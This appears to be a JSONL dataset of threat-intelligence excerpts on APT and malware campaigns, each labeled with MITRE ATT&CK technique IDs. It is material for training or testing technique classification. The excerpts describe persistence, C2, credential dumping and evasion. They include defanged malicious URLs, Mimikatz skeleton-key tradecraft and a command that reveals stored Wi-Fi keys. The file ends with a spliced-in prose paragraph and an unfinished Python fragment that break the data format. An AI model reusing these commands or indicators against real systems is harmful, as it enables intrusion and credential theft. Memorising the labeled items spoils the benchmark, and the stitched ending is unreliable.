{"text1":"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. Screenshot of the stager found in the document The stager then reached out to the actor-controlled C2 server located at hxxp:\/\/38[.]132[.]99[.]167\/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script","labels":"['T1204.002']"}
{"text1":"If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. For each service, the malware attempts to take control of the service\u2019s executable \u2014 first using icacls.exe with the \/reset flag to reset the executable\u2019s permissions, then using takeown.exe with the \/F flag to take ownership of the executable","labels":"['T1222.001']"}
{"text1":"Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020","labels":"['T1047']"}
{"text1":"The script itself decodes and executes a large blob of base64-encoded text and converts it into a huge byte array","labels":"['T1140']"}
{"text1":"Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn\u2019t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself","labels":"['T1568.002', 'T1008']"}
{"text1":"Figure 7: Dropbox-themed landing page with a lure asking users to click a button that links to the malicious document","labels":"['T1204.001']"}
{"text1":"Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. All these builds exhibit common functionality.Agent.btz is a DLL file. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive","labels":"['T1560.003']"}
{"text1":"The cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The campaign targeting other countries used spear-phishing as the delivery method","labels":"['T1189']"}
{"text1":"In cases where spam attachments could be verified \u2014 once a user has opened the attachment and enabled macro functionality \u2014 a PowerShell script downloads either Emotet, Bokbot or Trickbot, with the end payload being TrickBot","labels":"['T1566.001']"}
{"text1":"There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. If all the DCs don\u2019t have skeleton key configured, the master password won\u2019t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Skeleton Key Mitigation: - Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don\u2019t let DLA accounts logon to systems at a different security level from Domain Controllers","labels":"['T1098']"}
{"text1":"In the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply command lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the Windows registry. Figure 1 shows how the persistence is established","labels":"['T1546.003']"}
{"text1":"The Updater.exe program has the same program icon as CelasTradePro.exe. When run, it checks for the CheckUpdate parameter, collects the victim\u2019s host information (System Owner\/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (Exfiltration Over C2 Channel [T1041","labels":"['T1082', 'T1041']"}
{"text1":"running software, system name, IP address) - install additional malware onto the system - check for the presence of 29 different antivirus tools","labels":"['T1518.001']"}
{"text1":"Poseidon utilizes a variety of tools. Their main infection tool has been steadily evolving since 2005, with code remnants remaining the same to this day, while others have been altered to fit the requirements of new operating systems and specific campaigns. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective","labels":"['T1059.001']"}
{"text1":"All the strings used by the malware are encrypted and are decrypted by Rijndael\u00a0symmetric encryption algorithm in the \u201c<Module>.\\u200E\u201d function. This function receives a number as an input and generates three byte arrays containing input to be decrypted, key and IV (Figure 6","labels":"['T1140']"}
{"text1":"As with other adversaries that mine cryptocurrency opportunistically, Blue Mockingbird likes to move laterally and distribute mining payloads across an enterprise","labels":"['T1021.002', 'T1053.005', 'T1021.001']"}
{"text1":"In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder","labels":"['T1547.001']"}
{"text1":"ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus, also dubbed APT32 and APT-C-00","labels":"['T1027']"}
{"text1":"Executes VBScript using Process.Start. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Drops AdvancedRun.exe using File.WriteAllBytes. AdvancedRun.exe\" is a tool provided by Nirsoft to execute a program with different settings. Once the tool is dropped, the third stage DLL will leverage it to execute two commands in the context of the Windows TrustedInstaller group. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files. AdvanceRun is one of the tools that can be used to execute commands in the context of the TrustedInstaller user. This functionality is only available via CLI and requires the flag of \"\/RunAs 8\", which is shown in the commands below. The tool will be deleted from the %TEMP% directory after executing both commands. The first command leverages the Windows service control application (sc.exe) to disable Windows Defender","labels":"['T1562.001', 'T1078.001']"}
{"text1":"Stonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and downloading additional files. The malware also features a destructive component, which can wipe the master boot record of an infected computer","labels":"['T1561.002']"}
{"text1":"Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution. 29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly","labels":"['T1036.004']"}
{"text1":"The monitoring loop will retrieve the address of WTSEnumerateSessionsW and the local mac address using GetAdaptersInfo","labels":"['T1016']"}
{"text1":"The QuietSieve malware family refers to a series of heavily-obfuscated .NET binaries specifically designed to steal information from the target host. If this check succeeds, a randomly-generated alphanumeric prefix is created and combined with the callback domain as a subdomain before an initial request is made over HTTPS","labels":"['T1016.001']"}
{"text1":"The \u201cDocuments,\u201d \u201cDownloads,\u201d \u201cDesktop,\u201d and \u201cPictures\u201d folders of every user are checked. The DLL file also examines drives other than C","labels":"['T1083']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems","labels":"['T1102.001']"}
{"text1":"The decrypted result is saved as \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d (T1001) 6) If the file size of \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d exceeds 4,485 bytes, it is executed","labels":"['T1547.001']"}
{"text1":"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp","labels":"['T1204.002']"}
{"text1":"With domain administrator privileges obtained, the threat actors then moved laterally throughout the network using SMB and RDP to deploy Cobalt Strike beacons on the domain controllers around 1 hour after the initial execution of Bazar. On the domain controllers, some additional discovery was done using the PowerShell Active Directory module. After establishing Cobalt Strike beacons on those they felt ready to proceed to their final objectives","labels":"['T1021.002']"}
{"text1":"In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted","labels":"['T1135', 'T1134.001']"}
{"text1":"This hardens the encryption of the network communication, as a single RC4 key will not decrypt the entire payload. Leverages existing Windows registry key that is enabled by default in Windows 10 to store configuration data. Generates unique session keys for each connection to the C2 server. Employs polymorphic code, changing its runtime footprint during code execution to thwart memory analysis and evade signaturing. Encrypts or decrypts function blocks (code blocks) during runtime, as needed, to evade detection. Uses position independent code (PIC) to throw off static analysis tools","labels":"['T1140']"}
{"text1":"Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I\/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I\/O handles to send and receive data between the C2 server and the command shell (see Figure 1","labels":"['T1059.003', 'T1564.003']"}
{"text1":"1) The malicious .rtf file exploits CVE-2017-11882. 3) The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp:\/\/mumbai-m[.]site\/b.txt. 4) b.txt contains a PowerShell command to download a dropper from: hxxp:\/\/dns-update[.]club\/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script","labels":"['T1059.001', 'T1140']"}
{"text1":"This backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. The communication occurs via HTTPS over port 443","labels":"['T1071.001']"}
{"text1":"Once settles on victim\u2019s information systems, Egregor communicates with its Command and Control servers via HTTPS protocol so as to drop scripts or dynamic link libraries on infected hosts. You can find the list of C2 identified during investigations in section \u201cIP Addresses","labels":"['T1071.001']"}
{"text1":"OverWatch observed the threat actor retrieve three files with VBS file extensions from remote infrastructure. These files were then decoded using cscript.exe into an EXE, DLL and DAT file respectively. Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.2","labels":"['T1574.001']"}
{"text1":"These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. For systems that have not had MS17-010 applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target","labels":"['T1210']"}
{"text1":"Commands received from the control server are encoded DWORDs - After decoding, these DWORDs should be in the range 123459h to 123490h","labels":"['T1132.002']"}
{"text1":"Basically, the shellcode\u2019s main purpose is to launch other code stored in the registry key \\REGISTRY\\SOFTWARE\\Microsoft\\DRM. Below is the disassembled shellcode and commentaries for interested readers","labels":"['T1012']"}
{"text1":"In observed traffic these HTTP response bodies attempt to appear like benign XML related to .NET assemblies, but command data is actually spread across the many GUID and HEX strings present. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings","labels":"['T1001.002']"}
{"text1":"Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla\u00a0likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them","labels":"['T1090.001']"}
{"text1":"The C2 server will respond to the HTTP requests to the \u201cbat&m=d\u201d URL with a batch script that update.vbs will save to the \u201cdn\u201d folder and execute. The output of the downloaded batch script is saved to a text file in the \u201cup\u201d folder and uploaded to the C2 server via an HTTP POST request to the following URL","labels":"['T1074.001']"}
{"text1":"We saw a Waterbear loader named \"ociw32.dll\" inside one of the folders in the %PATH% environmental variable. This DLL name is hardcoded inside \"mtxoci.dll\" which is loaded by\u00a0the MSDTC service during boot-up. mtxoci.dll\u201d first tries to query the registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\" to see if the value \"OracleOciLib\" exists. If so, it retrieves the data inside it and loads the corresponding library. If the value doesn't exist, \u201cmtxoci.dll\u201d tries to load \"ociw32.dll\" instead. During our investigation, we noticed that the value \"OracleOciLib\" was deleted from the victim's machine, as shown in Figure 2. Hence, the malicious loader \"ociw32.dll\" was loaded and successfully executed on the host","labels":"['T1112']"}
{"text1":"This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts","labels":"['T1497']"}
{"text1":"Archive files that contain a legitimate executable and a malicious DLL, to be used in a DLL hijacking technique, taking advantage of legitimate executables such as Outlook and Avast proxy, to load a malicious DLL","labels":"['T1574.002']"}
{"text1":"Embedded Trojan This Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and execute a secondary payload, as well as downloading and opening a decoy document. Upon execution, this Trojan checks to see if it was configured with \"BINDERON\" to determine if it should extract an embedded payload from a resource named \"B\", save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the \"B\" resource, so this functionality does not carry out any activities, rather it just causes an exception and continues running. Another configuration option encountered by this Trojan is a check for '%STARTUPON%'. This sample was not configured to execute with this option enabled, however, should this option be enabled, the Trojan would attempt to install itself to the system at a specific location by writing its contents in base64-encoded format to the following file","labels":"['T1140']"}
{"text1":"On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call \u201cServHelper\u201d based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the \u201ctunnel\u201d variant of ServHelper, described in the \u201cMalware Analysis\u201d section","labels":"['T1204.001', 'T1204.002']"}
{"text1":"VALUEVAULT is a Golang compiled version of the \u201cWindows Vault Password Dumper\u201d browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel","labels":"['T1555.004']"}
{"text1":"Contains two DLL function exports: start and ss2 - Not dropped to the disk - Responsible for terminating processes and stopping\/disabling services related to endpoint security - Responsible for file encryption - Responsible for creating multiple worker threads for encryption - Responsible for creating the ransom notes - No longer uses the process rundll32.exe as a loader, but instead uses the MegaCortex binary as the DLL loader - Responsible for deleting volume shadow copies using vssadmin.exe and wiping deleted data from all drives using cipher.exe","labels":"['T1561.001']"}
{"text1":"The TerraLoader code performs several integrity checks before dropping the payload. These checks implement anti-debugging techniques and try to identify anomalies to prevent execution in sandboxed environments. Some of these techniques range from detecting incorrect parameters, filenames and extensions, to detecting hardware breakpoints or identifying specific modules loaded into the subject process. Should these checks all pass, the actual payload is decrypted and executed","labels":"['T1497.001']"}
{"text1":"The script is executed by the scheduled task used to maintain persistence, with its main goal being","labels":"['T1053.005']"}
{"text1":"Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright","labels":"['T1559.002']"}
{"text1":"If I open up the WebCacheV01.dat file in ESEDatabaseView or BrowsingHistoryView, I see browsing history leading up to my testing. Initially, I thought it was grabbing a copy of the file from a previous Volume Shadow Copy (VSC) but that isn\u2019t the case. Esentutl.exe is able to use the Volume Shadow Copy service to make a backup of a locked file","labels":"['T1003.003']"}
{"text1":"1) These lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. 2) Once the Gallmaker attackers gain access to a device, they execute various tools, including","labels":"['T1204.002', 'T1559.002']"}
{"text1":"The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant","labels":"['T1036.004', 'T1036.005']"}
{"text1":"Prior to execution of any recon command to gather information from the target machine, the default codepage of the console is changed to \u201c65001\u201d (utf-8","labels":"['T1082']"}
{"text1":"The malware cleans the system event logs using OpenEventLog\/ClearEventLog APIs, and then terminates the setup procedure with a call to StartService to run the stage 4 malware","labels":"['T1070.001']"}
{"text1":"APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes","labels":"['T1003', 'T1003.001']"}
{"text1":"Discovery of a Stealthy New Malware: \u201cCSPY Downloader\u201d is a tool designed to evade analysis and download additional payloads","labels":"['T1105']"}
{"text1":"The payload is embedded in\u00a0the macro as Base64 code. It uses the certutil program to decode the Base64 into a PE file which is then\u00a0executed","labels":"['T1140']"}
{"text1":"Scheduled tasks enable administrators to run tasks or \u201cjobs\u201d at designated times rather than every time the system is booted or the user logs in. This feature can be implemented via the Windows COM API, which the first versions of Ramsay have tailored. Based on the high ratio of similarity with Carberp\u2019s implementation, it\u2019s highly probable that Ramsay\u2019s implementation was adapted from Carberp\u2019s publicly available source code","labels":"['T1559.001', 'T1053.005']"}
{"text1":"48b9e25491e088a35105274cae0b9e67 MD5 hash of the current timestamp calculated during execution. MD5 hash of the current timestamp calculated during execution. 5-15 Lower\/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - Lower\/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - 0 0 or 1 \u2014 Utilize \u201cblend-in\u201d traffic requests. Internally called \u201cfalse_requesting\u201d - 0 Activate execution timestamp (0 by default) \u2014 execution \"activates\" or continues if current time is greater than the value in the configuration - Activate execution timestamp (0 by default) \u2014 execution \"activates\" or continues if current time is greater than the value in the configuration - - Base64-encoded User-agent used in HTTPS requests","labels":"['T1124']"}
{"text1":"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","labels":"['T1020']"}
{"text1":"Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443","labels":"['T1571']"}
{"text1":"The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key","labels":"['T1106']"}
{"text1":"The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy","labels":"['T1587.002']"}
{"text1":"persistence: Somewhat interestingly, OSX\/Dok persists in two phases. First as a Login Item, then as Launch Agents. When Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login Items will execute an application when the user logs in. Apple describes how to create a Login Item both manually and programmatically","labels":"['T1059.002']"}
{"text1":"The NOKKI payload is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior being executed in a new process. Persistence is achieved by writing the file path to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svstartup registry key","labels":"['T1547.001']"}
{"text1":"Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on","labels":"['T1033', 'T1069.002']"}
{"text1":"The following command line is a service created by CobaltStrike and can be found in Windows Event Logs (event id 7045). It runs an encoded powershell command","labels":"['T1059.001']"}
{"text1":"When a victim opens the document, Microsoft Word asks to enable\/disable macros. It reveals that a macro is embedded in the document","labels":"['T1059.005']"}
{"text1":"From my analyses, I was able to identify http:\/\/mdzz2019.noip[.]cn:19931 as its main C2 url. This is a dynamic DNS, meaning the actual IP changes quite frequently. Additionally, on that same url, http:\/\/mdzz2019.noip[.]cn:3654\/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell","labels":"['T1568.001']"}
{"text1":"The plugin proceeds to iterate through all connected drives on the system, looking for removable drives","labels":"['T1120']"}
{"text1":"Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. Here is an example decoy document: The purpose of the VisualBasic script is to execute the payload. Although the malicious part of the binary is only 2MB, the final file is more than 120MB in size, padded out with random data. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019","labels":"['T1036']"}
{"text1":"This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms","labels":"['T1547.001']"}
{"text1":"The code then uses the identified functions to add persistency through registry and add next stages file names identifier through the following locations","labels":"['T1037.001']"}
{"text1":"As happens so many times, it contains a Visual Basic script that will execute the malicious activities. This ZIP file contains a Python interpreter and Python script that is actually the RAT. The Word macro will unzip and execute the main script called \"launcher.py. The launcher script is responsible for checking the environment that the doc is currently being opened in. It assumes that all sandboxes will have hard drives smaller than 62GB. If it's in a sandbox environment, it will overwrite the malware scripts with the contents of the file \"License.txt\" and exit, thus deleting itself. Anti-sandbox code If it determines that it is not running in a sandbox environment, it will generate a unique ID, that is then replaced directly with the Python source code of the main scripts before executing it","labels":"['T1070.004']"}
{"text1":"Listing the C:\/ drive contents using cd C:\/; ls; - Listing the specific Wi-Fi profile details using netsh wlan show profiles name='<Name>' key=clear; - Listing the drives using Get-PSDrive","labels":"['T1083', 'T1049']"}
{"text1":"1) Use of zip file that contains a \u201c.lnk\u201d (Windows Shortcut) file. 2) Utilization of double extension trick (sample.doc.lnk) to convince users to open the file. 3) HTA (HTML Application) with VBScript embedded in the \u201c.lnk\u201d file 4) VBScript drops payloads and opens a decoy document or PDF to the user","labels":"['T1059.005']"}
{"text1":"The malware\u2019s second functionality is to gain persistence on an infected machine. After obtaining persistence, the next functionality of Linux Rabbit is to brute force SSH passwords which ultimately allows the malware to install the cryptocurrency miner onto the server. The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is \u201cblacklisted,\u201d it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine\u2019s hostname. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has","labels":"['T1033']"}
{"text1":"txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim\u2019s computer to mine cryptocurrency","labels":"['T1056.001', 'T1557']"}
{"text1":"1) Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file. 3) Set up external PROXY-C2 connection that was received with command 37 (update config)\/module 274 (proxy) by the stager","labels":"['T1071.001']"}
{"text1":"To start, the implant looks for the AHNLAB V3 Antivirus software's class name \"49B46336-BA4D-4905-9824-D282F05F6576\". If the software is found, the implant will hide the AV software window from the view of the infected user","labels":"['T1564.003', 'T1562.001']"}
{"text1":"Exfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below","labels":"['T1027']"}
{"text1":"Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective","labels":"['T1049']"}
{"text1":"REDBALDKNIGHT\u2019s use of steganography isn\u2019t limited to Daserf. Based on their pdb strings, they\u2019re both components of another REDBALDKNIGHT-related threat, XXMM (TROJ_KVNDM), a downloader Trojan that can also act as a first-stage backdoor with its capability to open a shell. While xxmm2_builder allows REDBALDKNIGHT to customize the settings of XXMM, xxmm2_ steganography is used to hide malicious code within an image file","labels":"['T1001.002']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1027.001']"}
{"text1":"cmd \/c tasklist: Executes this command to collect a list of running processes on victim\u2019s machine and store them in a tmp file","labels":"['T1005', 'T1082']"}
{"text1":"The malware will actually search through the \/Users\/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that","labels":"['T1036.005', 'T1554']"}
|
|
{"text1":"APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits","labels":"['T1566.001']"}
|
|
{"text1":"Current variants will often drop or retrieve secondary executables to inject into, or they will attempt to inject into known (and vulnerable) binaries already present on targeted hosts","labels":"['T1055']"}
|
|
{"text1":"As described in the analysis of the group\u2019s previous macOS backdoor, a clientID is created. This identifier is the MD5 hash of the return value of one of the following commands","labels":"['T1082']"}
|
|
{"text1":"The C2 domain used in this shellcode has been categorized as malware in DNS Security, URL Filtering and WildFire, which are security subscriptions for Next-Generation Firewall customers. App-ID, the traffic classification system in Next-Generation Firewalls, is capable of identifying applications irrespective of port, protocol, encryption (SSH or SSL) or any other evasive tactic used by the application. This shellcode attempts to communicate over TCP port 443 with traffic that does not conform to proper SSL or any other known application. As a matter of best practice, we advise customers to block unknown outbound TCP traffic in their security policies","labels":"['T1571']"}
|
|
{"text1":"Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte","labels":"['T1140']"}
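The XOR step in the record above is a byte-chaining scheme, and the detail that matters is the direction of the walk: going from the last byte backwards means each byte is XORed with its neighbour while that neighbour is still in its encrypted form. The following is an added example written for this page, not code from the report it quotes; it assumes a forward-chaining encryptor as the inverse of the described step so the decryptor can be exercised on constructed input, and it does not model the later decryption stages of the real sample, which are not described here.

```python
"""
Added example (not the original report's code): the single XOR step described in
Figure 3. Each byte is XORed with the byte immediately before it, walking from the
last byte backwards and leaving the first byte untouched. The encryptor is assumed
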